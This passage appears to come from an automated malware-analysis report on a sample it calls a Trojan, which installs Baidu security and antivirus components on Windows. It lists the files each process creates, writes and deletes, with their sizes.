%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\license.txt (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (0 bytes)

The process BaiduHips.exe:3260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000005.sst (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\smr.dat (95096 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (1368 bytes)
%System%\drivers\BDDefense.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%WinDir%\Temp\Tar1B.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%WinDir%\Temp\Cab1A.tmp (56 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1724 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000005.sst (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (597 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%WinDir%\Temp\Tar1B.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\CURRENT (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch (0 bytes)
%WinDir%\Temp\Cab1A.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (0 bytes)

The process BaiduHips.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (112 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (384 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (37839 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (7972 bytes)
%WinDir%\Temp\Tar15.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (8657 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (223 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%WinDir%\Temp\Cab14.tmp (56 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1728 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (816 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)

The Trojan deletes the following file(s):

%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\CURRENT (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000001 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (0 bytes)
%WinDir%\Temp\Cab14.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\CURRENT (0 bytes)
%WinDir%\Temp\Tar15.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000001 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)

The process bddownloader.exe:3300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys.tmp.bdl (11169 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dnw.xml.tmp.bdl (245 bytes)

The process bddownloader.exe:3792 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fe56763bd610dbf0db84b6cd8b10202a.bdt (71 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerConfig.dat.bdl (1261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fb32afe4ccd37a3dbc2f8507075652b6.bdt (71 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\host.dat (306 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (14 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerXMLScript.dat.bdl (158 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (580 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (5230 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerLuaScript.dat.bdl (4154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\p2pconfig.dat (64 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch10\hipsClient.xml.bdl (3394 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (8 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (0 bytes)

The process G1023_s_70904.exe:3576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SWManager.rdb (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\CompatibilityChecker.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSysFixerPlugin.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDownload.dll (11496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerLuaScript.dat (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnTray.exe (66168 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDConfig.dll (3073 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcher.dll (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTips.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHips.exe (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\patch.7z (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNet.dll (60999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccEngine.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAcceleratorPlugin.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNestCore.dll (18424 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccCoolyPlugin.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftMgrCoolyPlugin.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\LocalPluginInfo.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerScript.dat (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMMsg.dll (47 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurl.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceCleanerConfig.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDCooly.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NotInstalledPlugin.xml (428 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0002.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_appassext.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PreU.xml (643 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDArKit.sys (11688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerConfig.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDActiveDefensePlugin.dll (7192 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsIU.dll (63 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\ad.dll (3361 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0001.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsCore.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccSusPlugin.dll (12536 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Unknownfile.rdb (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\scan_mgr_config.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVCached.dll (24416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\wverify.dat (66168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_acc.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\homepage.ini (361 bytes)
%WinDir%\Fonts\baiduan_number_new.ttf (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginManager.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWDeskGuide.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\publish.db (185551 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\DriverManager.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBusiness.dll (1281 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_second_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVCommonRes.rdb (3616 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWUpdateTip.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GlobalPluginInfo.xml (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonSusPlugin.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (2013786 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDEnhanceBoost.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDPerflog.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAn.exe (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnBugRpt.exe (23936 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\blacksign.dat (852 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceConfig.xml (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWDeepClean.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageConfig.xml (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVMainPlugin.dll (25776 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\baiduan_number_new.ttf (784 bytes)
%System%\config\SYSTEM.LOG (9441 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\NetService.ini (615 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDLogicUtils.dll (15656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepMgr.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerPreScan.dat (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDKV.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftmgr.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysAccLiveStrategy.dat (4992 bytes)
